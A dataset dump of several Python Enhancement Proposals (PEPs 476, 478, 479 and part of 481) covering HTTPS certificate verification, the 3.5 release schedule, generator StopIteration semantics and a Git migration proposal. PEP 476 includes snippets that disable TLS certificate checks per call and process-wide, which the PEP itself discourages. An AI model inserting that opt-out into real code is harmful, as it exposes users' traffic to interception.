text
stringlengths 330
67k
| status
stringclasses 9
values | title
stringlengths 18
80
| type
stringclasses 3
values | abstract
stringlengths 4
917
|
---|---|---|---|---|
PEP 476 – Enabling certificate verification by default for stdlib http clients
Author:
Alex Gaynor <alex.gaynor at gmail.com>
Status:
Final
Type:
Standards Track
Created:
28-Aug-2014
Python-Version:
2.7.9, 3.4.3, 3.5
Resolution:
Python-Dev message
Table of Contents
Abstract
Rationale
Technical Details
Trust database
Backwards compatibility
Opting out
Other protocols
Python Versions
Implementation
Copyright
Abstract
Currently when a standard library http client (the urllib, urllib2,
http, and httplib modules) encounters an https:// URL it will wrap
the network HTTP traffic in a TLS stream, as is necessary to communicate with
such a server. However, during the TLS handshake it will not actually check
that the server has an X509 certificate is signed by a CA in any trust root,
nor will it verify that the Common Name (or Subject Alternate Name) on the
presented certificate matches the requested host.
The failure to do these checks means that anyone with a privileged network
position is able to trivially execute a man in the middle attack against a
Python application using either of these HTTP clients, and change traffic at
will.
This PEP proposes to enable verification of X509 certificate signatures, as
well as hostname verification for Python’s HTTP clients by default, subject to
opt-out on a per-call basis. This change would be applied to Python 2.7, Python
3.4, and Python 3.5.
Rationale
The “S” in “HTTPS” stands for secure. When Python’s users type “HTTPS” they are
expecting a secure connection, and Python should adhere to a reasonable
standard of care in delivering this. Currently we are failing at this, and in
doing so, APIs which appear simple are misleading users.
When asked, many Python users state that they were not aware that Python failed
to perform these validations, and are shocked.
The popularity of requests (which enables these checks by default)
demonstrates that these checks are not overly burdensome in any way, and the
fact that it is widely recommended as a major security improvement over the
standard library clients demonstrates that many expect a higher standard for
“security by default” from their tools.
The failure of various applications to note Python’s negligence in this matter
is a source of regular CVE assignment [1] [2] [3] [4] [5] [6] [7] [8]
[9] [10] [11].
[1]
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4340
[2]
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3533
[3]
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5822
[4]
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5825
[5]
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1909
[6]
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2037
[7]
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2073
[8]
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2191
[9]
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4111
[10]
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6396
[11]
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6444
Technical Details
Python would use the system provided certificate database on all platforms.
Failure to locate such a database would be an error, and users would need to
explicitly specify a location to fix it.
This will be achieved by adding a new ssl._create_default_https_context
function, which is the same as ssl.create_default_context.
http.client can then replace its usage of ssl._create_stdlib_context
with the ssl._create_default_https_context.
Additionally ssl._create_stdlib_context is renamed
ssl._create_unverified_context (an alias is kept around for backwards
compatibility reasons).
Trust database
This PEP proposes using the system-provided certificate database. Previous
discussions have suggested bundling Mozilla’s certificate database and using
that by default. This was decided against for several reasons:
Using the platform trust database imposes a lower maintenance burden on the
Python developers – shipping our own trust database would require doing a
release every time a certificate was revoked.
Linux vendors, and other downstreams, would unbundle the Mozilla
certificates, resulting in a more fragmented set of behaviors.
Using the platform stores makes it easier to handle situations such as
corporate internal CAs.
OpenSSL also has a pair of environment variables, SSL_CERT_DIR and
SSL_CERT_FILE which can be used to point Python at a different certificate
database.
Backwards compatibility
This change will have the appearance of causing some HTTPS connections to
“break”, because they will now raise an Exception during handshake.
This is misleading however, in fact these connections are presently failing
silently, an HTTPS URL indicates an expectation of confidentiality and
authentication. The fact that Python does not actually verify that the user’s
request has been made is a bug, further: “Errors should never pass silently.”
Nevertheless, users who have a need to access servers with self-signed or
incorrect certificates would be able to do so by providing a context with
custom trust roots or which disables validation (documentation should strongly
recommend the former where possible). Users will also be able to add necessary
certificates to system trust stores in order to trust them globally.
Twisted’s 14.0 release made this same change, and it has been met with almost
no opposition.
Opting out
For users who wish to opt out of certificate verification on a single
connection, they can achieve this by providing the context argument to
urllib.urlopen:
import ssl
# This restores the same behavior as before.
context = ssl._create_unverified_context()
urllib.urlopen("https://no-valid-cert", context=context)
It is also possible, though highly discouraged, to globally disable
verification by monkeypatching the ssl module in versions of Python that
implement this PEP:
import ssl
try:
_create_unverified_https_context = ssl._create_unverified_context
except AttributeError:
# Legacy Python that doesn't verify HTTPS certificates by default
pass
else:
# Handle target environment that doesn't support HTTPS verification
ssl._create_default_https_context = _create_unverified_https_context
This guidance is aimed primarily at system administrators that wish to adopt
newer versions of Python that implement this PEP in legacy environments that
do not yet support certificate verification on HTTPS connections. For
example, an administrator may opt out by adding the monkeypatch above to
sitecustomize.py in their Standard Operating Environment for Python.
Applications and libraries SHOULD NOT be making this change process wide
(except perhaps in response to a system administrator controlled configuration
setting).
Particularly security sensitive applications should always provide an explicit
application defined SSL context rather than relying on the default behaviour
of the underlying Python implementation.
Other protocols
This PEP only proposes requiring this level of validation for HTTP clients, not
for other protocols such as SMTP.
This is because while a high percentage of HTTPS servers have correct
certificates, as a result of the validation performed by browsers, for other
protocols self-signed or otherwise incorrect certificates are far more common.
Note that for SMTP at least, this appears to be changing and should be reviewed
for a potential similar PEP in the future:
https://www.facebook.com/notes/protect-the-graph/the-current-state-of-smtp-starttls-deployment/1453015901605223
https://www.facebook.com/notes/protect-the-graph/massive-growth-in-smtp-starttls-deployment/1491049534468526
Python Versions
This PEP describes changes that will occur on both the 3.4.x, 3.5 and 2.7.X
branches. For 2.7.X this will require backporting the context
(SSLContext) argument to httplib, in addition to the features already
backported in PEP 466.
Implementation
LANDED: Issue 22366 adds the
context argument to urlib.request.urlopen.
Issue 22417 implements the substance
of this PEP.
Copyright
This document has been placed into the public domain.
| Final | PEP 476 – Enabling certificate verification by default for stdlib http clients | Standards Track | Currently when a standard library http client (the urllib, urllib2,
http, and httplib modules) encounters an https:// URL it will wrap
the network HTTP traffic in a TLS stream, as is necessary to communicate with
such a server. However, during the TLS handshake it will not actually check
that the server has an X509 certificate is signed by a CA in any trust root,
nor will it verify that the Common Name (or Subject Alternate Name) on the
presented certificate matches the requested host. |
PEP 478 – Python 3.5 Release Schedule
Author:
Larry Hastings <larry at hastings.org>
Status:
Final
Type:
Informational
Topic:
Release
Created:
22-Sep-2014
Python-Version:
3.5
Table of Contents
Abstract
Release Manager and Crew
Release Schedule
Features for 3.5
Copyright
Abstract
This document describes the development and release schedule for
Python 3.5. The schedule primarily concerns itself with PEP-sized
items.
Release Manager and Crew
3.5 Release Manager: Larry Hastings
Windows installers: Steve Dower
Mac installers: Ned Deily
Documentation: Georg Brandl
Release Schedule
Python 3.5 has now reached its end-of-life and has been retired.
No more releases will be made.
These are all the historical releases of Python 3.5,
including their release dates.
3.5.0 alpha 1: February 8, 2015
3.5.0 alpha 2: March 9, 2015
3.5.0 alpha 3: March 29, 2015
3.5.0 alpha 4: April 19, 2015
3.5.0 beta 1: May 24, 2015
(Beta 1 is also “feature freeze”–no new features beyond this point.)
3.5.0 beta 2: May 31, 2015
3.5.0 beta 3: July 5, 2015
3.5.0 beta 4: July 26, 2015
3.5.0 release candidate 1: August 10, 2015
3.5.0 release candidate 2: August 25, 2015
3.5.0 release candidate 3: September 7, 2015
3.5.0 final: September 13, 2015
3.5.1 release candidate 1: November 22, 2015
3.5.1 final: December 6, 2015
3.5.2 release candidate 1: Sunday, June 12, 2016
3.5.2 final: Sunday, June 26, 2016
3.5.3 candidate 1: January 2, 2017
3.5.3 final: January 17, 2017
3.5.4 candidate 1: July 25, 2017
3.5.4 final: August 8, 2017
3.5.5 candidate 1: January 23, 2018
3.5.5 final: February 4, 2018
3.5.6 candidate 1: July 19, 2018
3.5.6 final: August 2, 2018
3.5.7 candidate 1: March 4, 2019
3.5.7 final: March 18, 2019
3.5.8 candidate 1: September 9, 2019
3.5.8 candidate 2: October 12, 2019
3.5.8 final: October 29, 2019
3.5.9 final: November 1, 2019
3.5.10 rc1: August 21, 2020
3.5.10 final: September 5, 2020
Features for 3.5
PEP 441, improved Python zip application support
PEP 448, additional unpacking generalizations
PEP 461, “%-formatting” for bytes and bytearray objects
PEP 465, a new operator (“@”) for matrix multiplication
PEP 471, os.scandir(), a fast new directory traversal function
PEP 475, adding support for automatic retries of interrupted system calls
PEP 479, change StopIteration handling inside generators
PEP 484, the typing module, a new standard for type annotations
PEP 485, math.isclose(), a function for testing approximate equality
PEP 486, making the Windows Python launcher aware of virtual environments
PEP 488, eliminating .pyo files
PEP 489, a new and improved mechanism for loading extension modules
PEP 492, coroutines with async and await syntax
Copyright
This document has been placed in the public domain.
| Final | PEP 478 – Python 3.5 Release Schedule | Informational | This document describes the development and release schedule for
Python 3.5. The schedule primarily concerns itself with PEP-sized
items. |
PEP 479 – Change StopIteration handling inside generators
Author:
Chris Angelico <rosuav at gmail.com>, Guido van Rossum <guido at python.org>
Status:
Final
Type:
Standards Track
Created:
15-Nov-2014
Python-Version:
3.5
Post-History:
15-Nov-2014, 19-Nov-2014, 05-Dec-2014
Table of Contents
Abstract
Acceptance
Rationale
Background information
Proposal
Consequences for existing code
Writing backwards and forwards compatible code
Examples of breakage
Explanation of generators, iterators, and StopIteration
Transition plan
Alternate proposals
Raising something other than RuntimeError
Supplying a specific exception to raise on return
Making return-triggered StopIterations obvious
Converting the exception inside next()
Sub-proposal: decorator to explicitly request current behaviour
Criticism
Why not fix all __next__() methods?
References
Copyright
Abstract
This PEP proposes a change to generators: when StopIteration is
raised inside a generator, it is replaced with RuntimeError.
(More precisely, this happens when the exception is about to bubble
out of the generator’s stack frame.) Because the change is backwards
incompatible, the feature is initially introduced using a
__future__ statement.
Acceptance
This PEP was accepted by the BDFL on November 22. Because of the
exceptionally short period from first draft to acceptance, the main
objections brought up after acceptance were carefully considered and
have been reflected in the “Alternate proposals” section below.
However, none of the discussion changed the BDFL’s mind and the PEP’s
acceptance is now final. (Suggestions for clarifying edits are still
welcome – unlike IETF RFCs, the text of a PEP is not cast in stone
after its acceptance, although the core design/plan/specification
should not change after acceptance.)
Rationale
The interaction of generators and StopIteration is currently
somewhat surprising, and can conceal obscure bugs. An unexpected
exception should not result in subtly altered behaviour, but should
cause a noisy and easily-debugged traceback. Currently,
StopIteration raised accidentally inside a generator function will
be interpreted as the end of the iteration by the loop construct
driving the generator.
The main goal of the proposal is to ease debugging in the situation
where an unguarded next() call (perhaps several stack frames deep)
raises StopIteration and causes the iteration controlled by the
generator to terminate silently. (Whereas, when some other exception
is raised, a traceback is printed pinpointing the cause of the
problem.)
This is particularly pernicious in combination with the yield from
construct of PEP 380, as it breaks the abstraction that a
subgenerator may be factored out of a generator. That PEP notes this
limitation, but notes that “use cases for these [are] rare to
non-existent”. Unfortunately while intentional use is rare, it is
easy to stumble on these cases by accident:
import contextlib
@contextlib.contextmanager
def transaction():
print('begin')
try:
yield from do_it()
except:
print('rollback')
raise
else:
print('commit')
def do_it():
print('Refactored initial setup')
yield # Body of with-statement is executed here
print('Refactored finalization of successful transaction')
def gene():
for i in range(2):
with transaction():
yield i
# return
raise StopIteration # This is wrong
print('Should not be reached')
for i in gene():
print('main: i =', i)
Here factoring out do_it into a subgenerator has introduced a
subtle bug: if the wrapped block raises StopIteration, under the
current behavior this exception will be swallowed by the context
manager; and, worse, the finalization is silently skipped! Similarly
problematic behavior occurs when an asyncio coroutine raises
StopIteration, causing it to terminate silently, or when next
is used to take the first result from an iterator that unexpectedly
turns out to be empty, for example:
# using the same context manager as above
import pathlib
with transaction():
print('commit file {}'.format(
# I can never remember what the README extension is
next(pathlib.Path('/some/dir').glob('README*'))))
In both cases, the refactoring abstraction of yield from breaks
in the presence of bugs in client code.
Additionally, the proposal reduces the difference between list
comprehensions and generator expressions, preventing surprises such as
the one that started this discussion [2]. Henceforth, the following
statements will produce the same result if either produces a result at
all:
a = list(F(x) for x in xs if P(x))
a = [F(x) for x in xs if P(x)]
With the current state of affairs, it is possible to write a function
F(x) or a predicate P(x) that causes the first form to produce
a (truncated) result, while the second form raises an exception
(namely, StopIteration). With the proposed change, both forms
will raise an exception at this point (albeit RuntimeError in the
first case and StopIteration in the second).
Finally, the proposal also clears up the confusion about how to
terminate a generator: the proper way is return, not
raise StopIteration.
As an added bonus, the above changes bring generator functions much
more in line with regular functions. If you wish to take a piece of
code presented as a generator and turn it into something else, you
can usually do this fairly simply, by replacing every yield with
a call to print() or list.append(); however, if there are any
bare next() calls in the code, you have to be aware of them. If
the code was originally written without relying on StopIteration
terminating the function, the transformation would be that much
easier.
Background information
When a generator frame is (re)started as a result of a __next__()
(or send() or throw()) call, one of three outcomes can occur:
A yield point is reached, and the yielded value is returned.
The frame is returned from; StopIteration is raised.
An exception is raised, which bubbles out.
In the latter two cases the frame is abandoned (and the generator
object’s gi_frame attribute is set to None).
Proposal
If a StopIteration is about to bubble out of a generator frame, it
is replaced with RuntimeError, which causes the next() call
(which invoked the generator) to fail, passing that exception out.
From then on it’s just like any old exception. [3]
This affects the third outcome listed above, without altering any
other effects. Furthermore, it only affects this outcome when the
exception raised is StopIteration (or a subclass thereof).
Note that the proposed replacement happens at the point where the
exception is about to bubble out of the frame, i.e. after any
except or finally blocks that could affect it have been
exited. The StopIteration raised by returning from the frame is
not affected (the point being that StopIteration means that the
generator terminated “normally”, i.e. it did not raise an exception).
A subtle issue is what will happen if the caller, having caught the
RuntimeError, calls the generator object’s __next__() method
again. The answer is that from this point on it will raise
StopIteration – the behavior is the same as when any other
exception was raised by the generator.
Another logical consequence of the proposal: if someone uses
g.throw(StopIteration) to throw a StopIteration exception into
a generator, if the generator doesn’t catch it (which it could do
using a try/except around the yield), it will be transformed
into RuntimeError.
During the transition phase, the new feature must be enabled
per-module using:
from __future__ import generator_stop
Any generator function constructed under the influence of this
directive will have the REPLACE_STOPITERATION flag set on its code
object, and generators with the flag set will behave according to this
proposal. Once the feature becomes standard, the flag may be dropped;
code should not inspect generators for it.
A proof-of-concept patch has been created to facilitate testing. [4]
Consequences for existing code
This change will affect existing code that depends on
StopIteration bubbling up. The pure Python reference
implementation of groupby [5] currently has comments “Exit on
StopIteration” where it is expected that the exception will
propagate and then be handled. This will be unusual, but not unknown,
and such constructs will fail. Other examples abound, e.g. [6], [7].
(Alyssa Coghlan comments: “””If you wanted to factor out a helper
function that terminated the generator you’d have to do “return
yield from helper()” rather than just “helper()”.”””)
There are also examples of generator expressions floating around that
rely on a StopIteration raised by the expression, the target or the
predicate (rather than by the __next__() call implied in the for
loop proper).
Writing backwards and forwards compatible code
With the exception of hacks that raise StopIteration to exit a
generator expression, it is easy to write code that works equally well
under older Python versions as under the new semantics.
This is done by enclosing those places in the generator body where a
StopIteration is expected (e.g. bare next() calls or in some
cases helper functions that are expected to raise StopIteration)
in a try/except construct that returns when StopIteration is
raised. The try/except construct should appear directly in the
generator function; doing this in a helper function that is not itself
a generator does not work. If raise StopIteration occurs directly
in a generator, simply replace it with return.
Examples of breakage
Generators which explicitly raise StopIteration can generally be
changed to simply return instead. This will be compatible with all
existing Python versions, and will not be affected by __future__.
Here are some illustrations from the standard library.
Lib/ipaddress.py:
if other == self:
raise StopIteration
Becomes:
if other == self:
return
In some cases, this can be combined with yield from to simplify
the code, such as Lib/difflib.py:
if context is None:
while True:
yield next(line_pair_iterator)
Becomes:
if context is None:
yield from line_pair_iterator
return
(The return is necessary for a strictly-equivalent translation,
though in this particular file, there is no further code, and the
return can be omitted.) For compatibility with pre-3.3 versions
of Python, this could be written with an explicit for loop:
if context is None:
for line in line_pair_iterator:
yield line
return
More complicated iteration patterns will need explicit try/except
constructs. For example, a hypothetical parser like this:
def parser(f):
while True:
data = next(f)
while True:
line = next(f)
if line == "- end -": break
data += line
yield data
would need to be rewritten as:
def parser(f):
while True:
try:
data = next(f)
while True:
line = next(f)
if line == "- end -": break
data += line
yield data
except StopIteration:
return
or possibly:
def parser(f):
for data in f:
while True:
line = next(f)
if line == "- end -": break
data += line
yield data
The latter form obscures the iteration by purporting to iterate over
the file with a for loop, but then also fetches more data from
the same iterator during the loop body. It does, however, clearly
differentiate between a “normal” termination (StopIteration
instead of the initial line) and an “abnormal” termination (failing
to find the end marker in the inner loop, which will now raise
RuntimeError).
This effect of StopIteration has been used to cut a generator
expression short, creating a form of takewhile:
def stop():
raise StopIteration
print(list(x for x in range(10) if x < 5 or stop()))
# prints [0, 1, 2, 3, 4]
Under the current proposal, this form of non-local flow control is
not supported, and would have to be rewritten in statement form:
def gen():
for x in range(10):
if x >= 5: return
yield x
print(list(gen()))
# prints [0, 1, 2, 3, 4]
While this is a small loss of functionality, it is functionality that
often comes at the cost of readability, and just as lambda has
restrictions compared to def, so does a generator expression have
restrictions compared to a generator function. In many cases, the
transformation to full generator function will be trivially easy, and
may improve structural clarity.
Explanation of generators, iterators, and StopIteration
The proposal does not change the relationship between generators and
iterators: a generator object is still an iterator, and not all
iterators are generators. Generators have additional methods that
iterators don’t have, like send and throw. All this is
unchanged. Nothing changes for generator users – only authors of
generator functions may have to learn something new. (This includes
authors of generator expressions that depend on early termination of
the iteration by a StopIteration raised in a condition.)
An iterator is an object with a __next__ method. Like many other
special methods, it may either return a value, or raise a specific
exception - in this case, StopIteration - to signal that it has
no value to return. In this, it is similar to __getattr__ (can
raise AttributeError), __getitem__ (can raise KeyError),
and so on. A helper function for an iterator can be written to
follow the same protocol; for example:
def helper(x, y):
if x > y: return 1 / (x - y)
raise StopIteration
def __next__(self):
if self.a: return helper(self.b, self.c)
return helper(self.d, self.e)
Both forms of signalling are carried through: a returned value is
returned, an exception bubbles up. The helper is written to match
the protocol of the calling function.
A generator function is one which contains a yield expression.
Each time it is (re)started, it may either yield a value, or return
(including “falling off the end”). A helper function for a generator
can also be written, but it must also follow generator protocol:
def helper(x, y):
if x > y: yield 1 / (x - y)
def gen(self):
if self.a: return (yield from helper(self.b, self.c))
return (yield from helper(self.d, self.e))
In both cases, any unexpected exception will bubble up. Due to the
nature of generators and iterators, an unexpected StopIteration
inside a generator will be converted into RuntimeError, but
beyond that, all exceptions will propagate normally.
Transition plan
Python 3.5: Enable new semantics under __future__ import; silent
deprecation warning if StopIteration bubbles out of a generator
not under __future__ import.
Python 3.6: Non-silent deprecation warning.
Python 3.7: Enable new semantics everywhere.
Alternate proposals
Raising something other than RuntimeError
Rather than the generic RuntimeError, it might make sense to raise
a new exception type UnexpectedStopIteration. This has the
downside of implicitly encouraging that it be caught; the correct
action is to catch the original StopIteration, not the chained
exception.
Supplying a specific exception to raise on return
Alyssa (Nick) Coghlan suggested a means of providing a specific
StopIteration instance to the generator; if any other instance of
StopIteration is raised, it is an error, but if that particular
one is raised, the generator has properly completed. This subproposal
has been withdrawn in favour of better options, but is retained for
reference.
Making return-triggered StopIterations obvious
For certain situations, a simpler and fully backward-compatible
solution may be sufficient: when a generator returns, instead of
raising StopIteration, it raises a specific subclass of
StopIteration (GeneratorReturn) which can then be detected.
If it is not that subclass, it is an escaping exception rather than a
return statement.
The inspiration for this alternative proposal was Alyssa’s observation
[8] that if an asyncio coroutine [9] accidentally raises
StopIteration, it currently terminates silently, which may present
a hard-to-debug mystery to the developer. The main proposal turns
such accidents into clearly distinguishable RuntimeError exceptions,
but if that is rejected, this alternate proposal would enable
asyncio to distinguish between a return statement and an
accidentally-raised StopIteration exception.
Of the three outcomes listed above, two change:
If a yield point is reached, the value, obviously, would still be
returned.
If the frame is returned from, GeneratorReturn (rather than
StopIteration) is raised.
If an instance of GeneratorReturn would be raised, instead an
instance of StopIteration would be raised. Any other exception
bubbles up normally.
In the third case, the StopIteration would have the value of
the original GeneratorReturn, and would reference the original
exception in its __cause__. If uncaught, this would clearly show
the chaining of exceptions.
This alternative does not affect the discrepancy between generator
expressions and list comprehensions, but allows generator-aware code
(such as the contextlib and asyncio modules) to reliably
differentiate between the second and third outcomes listed above.
However, once code exists that depends on this distinction between
GeneratorReturn and StopIteration, a generator that invokes
another generator and relies on the latter’s StopIteration to
bubble out would still be potentially wrong, depending on the use made
of the distinction between the two exception types.
Converting the exception inside next()
Mark Shannon suggested [10] that the problem could be solved in
next() rather than at the boundary of generator functions. By
having next() catch StopIteration and raise instead
ValueError, all unexpected StopIteration bubbling would be
prevented; however, the backward-incompatibility concerns are far
more serious than for the current proposal, as every next() call
now needs to be rewritten to guard against ValueError instead of
StopIteration - not to mention that there is no way to write one
block of code which reliably works on multiple versions of Python.
(Using a dedicated exception type, perhaps subclassing ValueError,
would help this; however, all code would still need to be rewritten.)
Note that calling next(it, default) catches StopIteration and
substitutes the given default value; this feature is often useful to
avoid a try/except block.
Sub-proposal: decorator to explicitly request current behaviour
Alyssa Coghlan suggested [11] that the situations where the current
behaviour is desired could be supported by means of a decorator:
from itertools import allow_implicit_stop
@allow_implicit_stop
def my_generator():
...
yield next(it)
...
Which would be semantically equivalent to:
def my_generator():
try:
...
yield next(it)
...
except StopIteration
return
but be faster, as it could be implemented by simply permitting the
StopIteration to bubble up directly.
Single-source Python 2/3 code would also benefit in a 3.7+ world,
since libraries like six and python-future could just define their own
version of “allow_implicit_stop” that referred to the new builtin in
3.5+, and was implemented as an identity function in other versions.
However, due to the implementation complexities required, the ongoing
compatibility issues created, the subtlety of the decorator’s effect,
and the fact that it would encourage the “quick-fix” solution of just
slapping the decorator onto all generators instead of properly fixing
the code in question, this sub-proposal has been rejected. [12]
Criticism
Unofficial and apocryphal statistics suggest that this is seldom, if
ever, a problem. [13] Code does exist which relies on the current
behaviour (e.g. [3], [6], [7]), and there is the concern that this
would be unnecessary code churn to achieve little or no gain.
Steven D’Aprano started an informal survey on comp.lang.python [14];
at the time of writing only two responses have been received: one was
in favor of changing list comprehensions to match generator
expressions (!), the other was in favor of this PEP’s main proposal.
The existing model has been compared to the perfectly-acceptable
issues inherent to every other case where an exception has special
meaning. For instance, an unexpected KeyError inside a
__getitem__ method will be interpreted as failure, rather than
permitted to bubble up. However, there is a difference. Special
methods use return to indicate normality, and raise to signal
abnormality; generators yield to indicate data, and return to
signal the abnormal state. This makes explicitly raising
StopIteration entirely redundant, and potentially surprising. If
other special methods had dedicated keywords to distinguish between
their return paths, they too could turn unexpected exceptions into
RuntimeError; the fact that they cannot should not preclude
generators from doing so.
Why not fix all __next__() methods?
When implementing a regular __next__() method, the only way to
indicate the end of the iteration is to raise StopIteration. So
catching StopIteration here and converting it to RuntimeError
would defeat the purpose. This is a reminder of the special status of
generator functions: in a generator function, raising
StopIteration is redundant since the iteration can be terminated
by a simple return.
References
[2]
Initial mailing list comment
(https://mail.python.org/pipermail/python-ideas/2014-November/029906.html)
[3] (1, 2)
Proposal by GvR
(https://mail.python.org/pipermail/python-ideas/2014-November/029953.html)
[4]
Tracker issue with Proof-of-Concept patch
(http://bugs.python.org/issue22906)
[5]
Pure Python implementation of groupby
(https://docs.python.org/3/library/itertools.html#itertools.groupby)
[6] (1, 2)
Split a sequence or generator using a predicate
(http://code.activestate.com/recipes/578416-split-a-sequence-or-generator-using-a-predicate/)
[7] (1, 2)
wrap unbounded generator to restrict its output
(http://code.activestate.com/recipes/66427-wrap-unbounded-generator-to-restrict-its-output/)
[8]
Post from Alyssa (Nick) Coghlan mentioning asyncio
(https://mail.python.org/pipermail/python-ideas/2014-November/029961.html)
[9]
Coroutines in asyncio
(https://docs.python.org/3/library/asyncio-task.html#coroutines)
[10]
Post from Mark Shannon with alternate proposal
(https://mail.python.org/pipermail/python-dev/2014-November/137129.html)
[11]
Idea from Alyssa Coghlan
(https://mail.python.org/pipermail/python-dev/2014-November/137201.html)
[12]
Rejection of above idea by GvR
(https://mail.python.org/pipermail/python-dev/2014-November/137243.html)
[13]
Response by Steven D’Aprano
(https://mail.python.org/pipermail/python-ideas/2014-November/029994.html)
[14]
Thread on comp.lang.python started by Steven D’Aprano
(https://mail.python.org/pipermail/python-list/2014-November/680757.html)
Copyright
This document has been placed in the public domain.
| Final | PEP 479 – Change StopIteration handling inside generators | Standards Track | This PEP proposes a change to generators: when StopIteration is
raised inside a generator, it is replaced with RuntimeError.
(More precisely, this happens when the exception is about to bubble
out of the generator’s stack frame.) Because the change is backwards
incompatible, the feature is initially introduced using a
__future__ statement. |
PEP 481 – Migrate CPython to Git, Github, and Phabricator
Author:
Donald Stufft <donald at stufft.io>
Status:
Withdrawn
Type:
Process
Created:
29-Nov-2014
Post-History:
29-Nov-2014
Table of Contents
Abstract
Rationale
Version Control System
Repository Hosting
Code Review
GitHub Pull Requests
Phabricator
Criticism
X is not written in Python
GitHub is not Free/Open Source
Mercurial is better than Git
CPython Workflow is too Complicated
Example: Scientific Python
References
Copyright
Abstract
Note
This PEP has been withdrawn, if you’re looking for the PEP
documenting the move to Github, please refer to PEP 512.
This PEP proposes migrating the repository hosting of CPython and the
supporting repositories to Git and Github. It also proposes adding Phabricator
as an alternative to Github Pull Requests to handle reviewing changes. This
particular PEP is offered as an alternative to PEP 474 and PEP 462 which aims
to achieve the same overall benefits but restricts itself to tools that support
Mercurial and are completely Open Source.
Rationale
CPython is an open source project which relies on a number of volunteers
donating their time. As an open source project it relies on attracting new
volunteers as well as retaining existing ones in order to continue to have
a healthy amount of manpower available. In addition to increasing the amount of
manpower that is available to the project, it also needs to allow for effective
use of what manpower is available.
The current toolchain of the CPython project is a custom and unique combination
of tools which mandates a workflow that is similar to one found in a lot of
older projects, but which is becoming less and less popular as time goes on.
The one-off nature of the CPython toolchain and workflow means that any new
contributor is going to need spend time learning the tools and workflow before
they can start contributing to CPython. Once a new contributor goes through
the process of learning the CPython workflow they also are unlikely to be able
to take that knowledge and apply it to future projects they wish to contribute
to. This acts as a barrier to contribution which will scare off potential new
contributors.
In addition the tooling that CPython uses is under-maintained, antiquated,
and it lacks important features that enable committers to more effectively use
their time when reviewing and approving changes. The fact that it is
under-maintained means that bugs are likely to last for longer, if they ever
get fixed, as well as it’s more likely to go down for extended periods of time.
The fact that it is antiquated means that it doesn’t effectively harness the
capabilities of the modern web platform. Finally the fact that it lacks several
important features such as a lack of pre-testing commits and the lack of an
automatic merge tool means that committers have to do needless busy work to
commit even the simplest of changes.
Version Control System
The first decision that needs to be made is the VCS of the primary server side
repository. Currently the CPython repository, as well as a number of supporting
repositories, uses Mercurial. When evaluating the VCS we must consider the
capabilities of the VCS itself as well as the network effect and mindshare of
the community around that VCS.
There are really only two real options for this, Mercurial and Git. Between the
two of them the technical capabilities are largely equivalent. For this reason
this PEP will largely ignore the technical arguments about the VCS system and
will instead focus on the social aspects.
It is not possible to get exact numbers for the number of projects or people
which are using a particular VCS, however we can infer this by looking at
several sources of information for what VCS projects are using.
The Open Hub (previously Ohloh) statistics [1] show that 37% of
the repositories indexed by The Open Hub are using Git (second only to SVN
which has 48%) while Mercurial has just 2% (beating only bazaar which has 1%).
This has Git being just over 18 times as popular as Mercurial on The Open Hub.
Another source of information on the popular of the difference VCSs is PyPI
itself. This source is more targeted at the Python community itself since it
represents projects developed for Python. Unfortunately PyPI does not have a
standard location for representing this information, so this requires manual
processing. If we limit our search to the top 100 projects on PyPI (ordered
by download counts) we can see that 62% of them use Git while 22% of them use
Mercurial while 13% use something else. This has Git being just under 3 times
as popular as Mercurial for the top 100 projects on PyPI.
Obviously from these numbers Git is by far the more popular DVCS for open
source projects and choosing the more popular VCS has a number of positive
benefits.
For new contributors it increases the likelihood that they will have already
learned the basics of Git as part of working with another project or if they
are just now learning Git, that they’ll be able to take that knowledge and
apply it to other projects. Additionally a larger community means more people
writing how to guides, answering questions, and writing articles about Git
which makes it easier for a new user to find answers and information about
the tool they are trying to learn.
Another benefit is that by nature of having a larger community, there will be
more tooling written around it. This increases options for everything from
GUI clients, helper scripts, repository hosting, etc.
Repository Hosting
This PEP proposes allowing GitHub Pull Requests to be submitted, however GitHub
does not have a way to submit Pull Requests against a repository that is not
hosted on GitHub. This PEP also proposes that in addition to GitHub Pull
Requests Phabricator’s Differential app can also be used to submit proposed
changes and Phabricator does allow submitting changes against a repository
that is not hosted on Phabricator.
For this reason this PEP proposes using GitHub as the canonical location of
the repository with a read-only mirror located in Phabricator. If at some point
in the future GitHub is no longer desired, then repository hosting can easily
be moved to solely in Phabricator and the ability to accept GitHub Pull
Requests dropped.
In addition to hosting the repositories on Github, a read only copy of all
repositories will also be mirrored onto the PSF Infrastructure.
Code Review
Currently CPython uses a custom fork of Rietveld which has been modified to
not run on Google App Engine which is really only able to be maintained
currently by one person. In addition it is missing out on features that are
present in many modern code review tools.
This PEP proposes allowing both Github Pull Requests and Phabricator changes
to propose changes and review code. It suggests both so that contributors can
select which tool best enables them to submit changes, and reviewers can focus
on reviewing changes in the tooling they like best.
GitHub Pull Requests
GitHub is a very popular code hosting site and is increasingly becoming the
primary place people look to contribute to a project. Enabling users to
contribute through GitHub is enabling contributors to contribute using tooling
that they are likely already familiar with and if they are not they are likely
to be able to apply to another project.
GitHub Pull Requests have a fairly major advantage over the older “submit a
patch to a bug tracker” model. It allows developers to work completely within
their VCS using standard VCS tooling so it does not require creating a patch
file and figuring out what the right location is to upload it to. This lowers
the barrier for sending a change to be reviewed.
On the reviewing side, GitHub Pull Requests are far easier to review, they have
nice syntax highlighted diffs which can operate in either unified or side by
side views. They allow expanding the context on a diff up to and including the
entire file. Finally they allow commenting inline and on the pull request as
a whole and they present that in a nice unified way which will also hide
comments which no longer apply. Github also provides a “rendered diff” view
which enables easily viewing a diff of rendered markup (such as rst) instead
of needing to review the diff of the raw markup.
The Pull Request work flow also makes it trivial to enable the ability to
pre-test a change before actually merging it. Any particular pull request can
have any number of different types of “commit statuses” applied to it, marking
the commit (and thus the pull request) as either in a pending, successful,
